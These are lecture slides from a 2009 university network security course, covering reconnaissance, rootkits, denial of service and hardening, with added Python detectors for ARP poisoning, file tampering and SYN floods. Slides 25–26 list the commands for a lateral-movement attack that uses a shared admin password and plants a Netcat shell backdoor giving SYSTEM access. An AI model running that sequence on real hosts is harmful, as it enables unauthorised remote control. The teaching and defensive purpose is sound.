
Network Security April 1, 2009




1. Network Security, April 1, 2009
• Disclaimer/AUP review
• Kevin Lanning, MSIS GSEC CISSP, Information Security Office, UNC-Chapel Hill
• Sources: Sans.org courses 401, 504 and 508; Isc2.org CBK

2. Information Security Triad: Policy

3. Information Security Triad: Networking
• Availability: the network as a key asset; VoIP and wireless
• Integrity: transmitted data must not contain errors
• Confidentiality: protection of sensitive information in transit

4. The Network (cartoon: Gary Larson, The Complete Far Side)

5. Threats
• Use of the network to carry out attacks
• Reconnaissance
  • White, grey and black box
  • Google hacking: open positions, contact lists, key staff, employee websites, design docs (examples)
  • DNS interrogation, zone transfer (dig or nslookup)
  • Whois
• Scanning/OS fingerprinting
  • Active: Nessus, nmap, Cheops network mapper (GUI; uses the TTL field of the IP header)
  • Passive
• Password cracking: brute force, dictionary, LANMAN
• Intrusion and covering the tracks: patching, log edits, lying low, listening

6. Threats
• Use of the network to carry out attacks (cont'd)
• Maintaining control: Netcat, cron, backdoors
  • Reverse WWW shell: uses port 80 outbound for the external connection. The shell runs on the host with input from the external system. Called "shoveling a UI". Firewall scope matters.
• Malware distribution
  • Remote control: Radmin, DameWare, Sub7, SSH
  • Worms: morphing into functional equivalents with a different code base = countermeasure against signatures
  • Botnets
    • Spread via worms, attachments, bundling with software, browser exploits (solves the scaling problem)
    • IRC control is most common

7. Threats
• Sniffing and snooping
  • Hubs vs. switches
  • Fiber
  • Wireless: WEP, WPA, 802.11i/WPA2; SSL VPNs? "Ghost in the AP"
  • Credential replay: tcpreplay
  • Cable-segment sniffing: NIC in promiscuous mode
• Attacks against the network itself
  • Denial of service
  • Attacks against protocols: half-open TCP connections; BGP (YouTube down due to a specific route published from Pakistan, per Arbor Networks)
  • Own the network with credentials

8. Threats & Risks
• Attacks using encryption: mask malicious code
• Zero-day exploits: solution unknown to vendor and public
• Vulnerable code: buffer overflows = not checking buffer sizes before moving things around in memory; goal = overwrite the instruction pointer so it points at what you want to execute
• Remote access: PDAs, laptops, unencrypted
• Covert channels: stego, IPID field data transfer (http://firstmonday.org/htbin/cgiwrap/bin/ojs/index.php/fm/article/view/528/449)

9. Threats & Risks: End Users
• Messaging/browsing
• Social engineering/phishing
• Weak protocols: telnet, rsh, X11, FTP

10. Threats & Risks
• IP address spoofing: hping
• ARP cache poisoning: gratuitous ARP
• Session hijacking: sniffing and spoofing, man-in-the-middle, ettercap
• Source routing: the source specifies each router
• DNS cache poisoning
• Replay attacks: netcat, tcpreplay
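Added detection-side example (my code, not from the slides) for the ARP cache poisoning item above, including its gratuitous-ARP variant: watch IP-to-MAC bindings over a constructed ARP trace and alert when a known binding, especially the gateway's, changes. The gateway address, MACs and trace are constructed for the demo.

```python
from collections import namedtuple

# Constructed sample ARP traffic for the demo; not a real capture.
Arp = namedtuple("Arp", "op sender_ip sender_mac target_ip")  # op: "request"/"reply"

def detect_arp_poisoning(packets, trusted):
    """Return alert strings for ARP replies that contradict a known IP->MAC binding.

    `trusted` seeds bindings that must never change (e.g. the default gateway),
    which is what a poisoner most often impersonates; other hosts are learned
    from the first reply seen and then watched for changes.
    """
    table = dict(trusted)
    alerts = []
    for p in packets:
        if p.op != "reply":
            continue                                   # only replies update a victim's cache
        gratuitous = p.sender_ip == p.target_ip        # unsolicited "I am X" announcement
        prev = table.get(p.sender_ip)
        if prev is None:
            table[p.sender_ip] = p.sender_mac          # first sighting: learn it
        elif prev != p.sender_mac:
            kind = "gratuitous ARP" if gratuitous else "ARP reply"
            alerts.append(f"{p.sender_ip} moved {prev} -> {p.sender_mac} ({kind})")
            if p.sender_ip not in trusted:
                table[p.sender_ip] = p.sender_mac      # mirror what victim caches now hold
    return alerts

GATEWAY = "192.0.2.1"
TRUSTED = {GATEWAY: "00:11:22:33:44:01"}
SAMPLE = [
    Arp("request", "192.0.2.50", "00:11:22:33:44:50", GATEWAY),
    Arp("reply", GATEWAY, "00:11:22:33:44:01", "192.0.2.50"),       # genuine answer
    Arp("reply", "192.0.2.60", "00:11:22:33:44:60", "192.0.2.50"),  # learned as normal
    Arp("reply", GATEWAY, "de:ad:be:ef:00:66", GATEWAY),            # forged gratuitous claim
    Arp("reply", "192.0.2.60", "de:ad:be:ef:00:66", "192.0.2.50"),  # same MAC takes a 2nd IP
]

if __name__ == "__main__":
    for a in detect_arp_poisoning(SAMPLE, TRUSTED):
        print("ALERT:", a)
```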

11. Threats & Risks
• Bots: application-level Trojan horses and backdoors which SCALE
• Backdoors: bypass normal security controls. Netcat listener, tini (3 KB); push it in via a buffer overflow?
• Ethernet card: firmware malware. Wireless?
• BIOS or CPU microcode level rootkits? http://www.packetstormsecurity.nl/0407-exploits/OpteronMicrocode.txt
• Rootkits: thousands of them
  • User mode: critical OS components replaced. Hacker Defender
  • Kernel mode: truly evil. The kernel itself is altered.

12. Threats & Risks: Rootkits (LRK)
• One example of a rootkit for Unix: LRK
• /bin/login is altered to allow the attacker root access
• Normal accounting is bypassed (who), and changing the root password has no impact on the backdoor
• Encrypted remote access via sshd
• Ethernet in promiscuous mode; the Trojan version of ifconfig hides the PROMISC flag
• Several programs are replaced with new versions so that any non-root user who runs one of the replaced apps with a command that includes the backdoor password in an argument is immediately elevated to root
• A replacement ps hides the attacker's processes
• A replacement killall ensures the attacker's processes cannot be killed
• crontab is modified so that scheduled attacker processes do not show in the cron config files
• netstat is altered to never show the ports used by the intruder
• ls and find are altered to never show the attacker's files
• du is altered to avoid showing the disk usage of the attacker's files
• syslogd is modified to hide events associated with the intrusion
• A "fix" tool returns the "last modified" dates to the originals, including the CRC checksum of the programs

13. Trends
• Anti-malware tools only catch a minority
  • Repackaging
  • Encoding
  • Morphing malware: same function but with a different code base
  • Firewalling of malware
• Multi-exploit and multi-platform worms (Nimda had 12: buffer overflows, browser exploits, etc.)

14. Trends
• More application-layer attacks: web (wget on *nix and Windows; CURL, Perl tool for constructing web requests and automated harvesting)
• PHP: #1 application attack at UNC-CH
• SQL injection attacks via the web
• Click, drag-and-drop hacker tools: Metasploit 3.0 scales the growth
• Hacking for profit; organized crime involved
• Lower diversity results in faster spread

  15. Intrusion Prevention Stats

16. Defenses/Countermeasures
• Know your environment: business, government, education
• Know where the valuable stuff exists
• Network design for defense in depth
  • Routing: choice of protocols, source routing
  • Split DNS
  • Out-of-band network for availability
• Firewalls
  • Packet filtering
  • Stateful
  • Proxy
  • DMZ: web, DB
• RFC 1918: non-routable addresses

17. Defenses/Countermeasures
• Secure protocols: used for good OR evil
  • IPsec
  • SSL
  • SSH
• Passwords = security 101
• Intrusion protection
  • Network intrusion detection sensors: tiny fragments = reassembly buffers (cd /etc/sha), fragment overlap; HD Moore, "Thermoptic Camouflage" = OS dependent
  • Anti-virus, spyware, malware: http://secunia.com/gfx/Secunia_Exploit-vs-AV_test-Oct-2008.pdf
  • HIDS, HIPS, "end point" protection

18. Defenses/Countermeasures
• Secure administration
  • Harden public-facing systems such as DNS: split-brain DNS, zone transfers only to specified systems
  • Don't allow insecure protocols, or scope them: telnet, FTP
  • Force password changes often
  • Authentication/authorization
  • Group Policy
• Bastion hosts: systems hardened to withstand attack
• Build a DMZ: web/DB
• Separate logging server

19. Defenses/Countermeasures
• Host hardening
  • File integrity checkers: Tripwire
  • Defense in depth
  • Only enable needed services: reduce the attack surface
  • Check for listening ports and open files: netstat -na and lsof -i
  • What has ports open: TCPView
  • Profile the system at build time
  • Patch, patch, patch
  • Offline or firewalled build
  • Special-purpose systems with lower privileges: VMs, Deep Freeze
  • Reduced privileges
  • Log management: write-once media for logging
  • Vulnerability management (demo)

20. Defenses/Countermeasures
• Use secure packages and versions
  • Apache mod_security
  • Exec Shield: http://en.wikipedia.org/wiki/Exec_Shield
  • SELinux: http://en.wikipedia.org/wiki/SE_Linux
  • Windows hardening; get rid of NT 4/2000
  • Solaris 10
  • NSA hardening guides: http://www.nsa.gov/snac/downloads_redhat.cfm?MenuID=scg10.3.1.1

21. Defenses/Countermeasures
• Encryption
  • Symmetric key: a single key for encryption and decryption
    • Fast
    • Secure distribution of the key is an issue
  • PKI (Public Key Infrastructure)
    • Computer users authenticate to each other without prior contact. A message encrypted with the recipient's public key can only be decrypted with the corresponding private key
    • Digital signature: a message signed with the private key can be verified by anyone with the public key
    • Certificate authority or web-of-trust model
    • Key exchange is secure
    • Slow
  • Hash functions or digests: input of any length with a fixed-length output = integrity check
    • http://upload.wikimedia.org/wikipedia/commons/6/6b/Hash_function_long.svg
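Added example (my code, not from the slides) that ties together the LRK "fix tool" trick from slide 12, the file integrity checker of slide 19 and the hash-as-integrity-check point above: a minimal Tripwire-style baseline using SHA-256, run over a constructed directory in which a binary is replaced and its timestamp restored, so only the cryptographic digest reveals the change. Paths and file contents are constructed for the demo.

```python
import hashlib
import os
import tempfile
from pathlib import Path

def sha256_file(path, chunk=65536):
    """Cryptographic digest of a file: fixed-length output for any input length."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(root):
    """Map each file under `root` (relative POSIX-style path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare(baseline, current):
    """Diff two baselines into added / removed / modified file lists."""
    b, c = set(baseline), set(current)
    return {"added": sorted(c - b),
            "removed": sorted(b - c),
            "modified": sorted(k for k in b & c if baseline[k] != current[k])}

def demo():
    """Constructed scenario: baseline a tiny tree, then simulate an LRK-style
    replacement of ls whose 'fix' tool also restores the original mtime."""
    with tempfile.TemporaryDirectory() as d:
        bin_dir = Path(d, "bin")
        bin_dir.mkdir()
        (bin_dir / "ls").write_bytes(b"original ls binary (constructed)")
        (bin_dir / "ps").write_bytes(b"original ps binary (constructed)")
        baseline = build_baseline(d)            # in practice: store this off-host / read-only
        st = (bin_dir / "ls").stat()
        (bin_dir / "ls").write_bytes(b"trojaned ls binary (constructed)")
        os.utime(bin_dir / "ls", (st.st_atime, st.st_mtime))   # mtime put back: ls -l sees nothing
        (bin_dir / "nc").write_bytes(b"dropped listener (constructed)")
        return compare(baseline, build_baseline(d))

if __name__ == "__main__":
    print(demo())   # {'added': ['bin/nc'], 'removed': [], 'modified': ['bin/ls']}
```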

22. Defenses/Countermeasures
• Insiders
  • Logging and auditing
  • Access controls
    • Least privilege
    • Separation of duties; escalation
  • Administrative controls
    • Mandatory vacation
    • Job rotation

23. Real Life Scenarios! Careful with the following:
• Distributed denial of service
• Imagine an organization with the same local account across all critical systems
• Web-based banking applications
• Port 80 authentication
• IPS with a false CRC that doesn't reset
• Take out the competition

24. Real Life Scenarios
• Distributed denial of service
  • Scenario: gambling site
  • Threat of DDoS
  • Strategies to counter?

25. Real Life Scenarios (extracted from SANS.org 504 with Ed Skoudis)
Same local account across all Windows systems
• Mount the target C$ share and assign the next available drive letter:
  • C:/>net use *\\[target_IP]\C$ [admin pwd] /u: [admin user name]
• Start Task Scheduler
  • C:/>sc \\[target_IP] start schedule
• Check local time on the target
  • C:/>net time \\[target_IP]

26. Real Life Scenarios
Same local account across all Windows systems
• Create a batch file with the command to run
  • C:\> notepad backdoor.bat
  • C:\> \test\netcat\nc.exe -l -p 2222 -e cmd.exe
• Move Netcat and backdoor.bat to the target
• Schedule the .bat to run
• Use Netcat to connect
  • C:\> nc target_IP 2222
• Now have full command-line access with SYSTEM privileges
• Now scale it!

27. Real Life Scenarios
• Imagine bankapp_inlsdemo.com
  • Must be accessible from everywhere
  • Have no control over the hosts
• How
  • Different errors for valid vs. invalid ID
  • Low, slow brute force
  • Google hacking
  • From where? Use the botnet
  • Scope out account lockouts: pattern?

28. Real Life Scenarios
• Port 80 authentication to a web site without firewall scoping
  • Remote connection from wireless or cable
  • Interception of traffic
  • Google hacking
  • Same password for other apps
  • Intruder breaks in to the other app

29. Real Life Scenarios
• Remove the competition
  • Smurf: spoof the source (use the victim's address) of a ping to a network's broadcast address. The spoofed system gets flooded with replies, taking it out of the mix.
  • SYN floods: half-open connections consume resources. Difficult to counter if highly distributed. Increase the connection queue and time out half-opens. Shorten timeouts?
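Added example (my code, not from the slides) showing the "half-open connections consume resources" and "shorten timeouts" points as detection logic: a half-open counter over a constructed packet trace, reporting backlog pressure and how many distinct sources are involved. The server address, backlog size, timeouts and trace are assumptions made for the demo.

```python
from collections import namedtuple

# Constructed packet trace (not a real capture). flags: "S" SYN, "SA" SYN-ACK, "A" ACK.
Pkt = namedtuple("Pkt", "t src dst flags")

SERVER = "203.0.113.10:80"

def half_open_connections(packets, server, now, timeout):
    """Return {client: syn_time} for handshakes to `server` still incomplete at `now`.

    A SYN opens an entry; the client's ACK (third packet) closes it. Entries older
    than `timeout` are treated as reaped by the kernel and no longer occupy the
    backlog, which is why shortening the half-open timeout is a mitigation.
    """
    pending = {}
    for p in packets:
        if p.dst != server or p.t > now:
            continue
        if p.flags == "S":
            pending.setdefault(p.src, p.t)
        elif p.flags == "A":
            pending.pop(p.src, None)
    return {src: t for src, t in pending.items() if now - t < timeout}

def syn_flood_report(packets, server, now, timeout, backlog):
    """Summarise backlog pressure; many distinct sources suggests spoofed/distributed."""
    open_ = half_open_connections(packets, server, now, timeout)
    sources = {src.rsplit(":", 1)[0] for src in open_}
    return {"half_open": len(open_), "distinct_sources": len(sources),
            "alert": len(open_) >= backlog}

def legit(client, t):   # a complete three-way handshake
    return [Pkt(t, client, SERVER, "S"), Pkt(t + 0.01, SERVER, client, "SA"),
            Pkt(t + 0.02, client, SERVER, "A")]

TRACE = legit("198.51.100.5:40000", 0.10) + legit("198.51.100.6:40001", 0.20)
# Eight SYNs from eight different sources that never complete the handshake.
TRACE += [Pkt(round(1.0 + 0.1 * i, 1), f"192.0.2.{i + 1}:{1000 + i}", SERVER, "S")
          for i in range(8)]

if __name__ == "__main__":
    print(syn_flood_report(TRACE, SERVER, now=2.0, timeout=3.0, backlog=5))
    print(syn_flood_report(TRACE, SERVER, now=2.0, timeout=0.5, backlog=5))
```

The second call shows the same trace with a much shorter half-open timeout: most entries have already been reaped, so the backlog no longer overflows.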

30. Real Life Scenarios
• Imagine you are a developer at a start-up IPS company. Everybody needs your services and your company could go $public$
  • Real-time action is the benefit
  • Must be fast
  • Hacker exploit?
  • Reset with a bad checksum?
  • Recalcs???

31. Real Life Scenarios
• The Storm worm is a good example of many things
• Check it out: http://en.wikipedia.org/wiki/Storm_Worm

32. Take Aways
• The hacker community is very well organized. We must organize too!
• Guard network credentials
• Hardening guides (see nsa.gov, sans.org, redhat.com, etc.)
• Vendor recommendations, but defense in depth against the zero-day exploit
• Tools, tools, tools
• Host-based IDS/IPS
• End-user education: they have the power
• Exciting time to be in security
• Host-based firewall: scope

33. Take Away and References
• Every day brings news and no one is immune. We must collaborate
• References
  • www.honeynet.org
  • Sans.org (see Top 20 and isc.sans.org)
  • Megasecurity.org (see Radmin tools list)
  • http://www.uscert.gov/
  • Vulnerabilities: http://www.milw0rm.com/ and http://secunia.com/
  • Microsoft: blogs.technet.com/msrc/
  • CISecurity: http://www.cisecurity.org/benchmarks.html
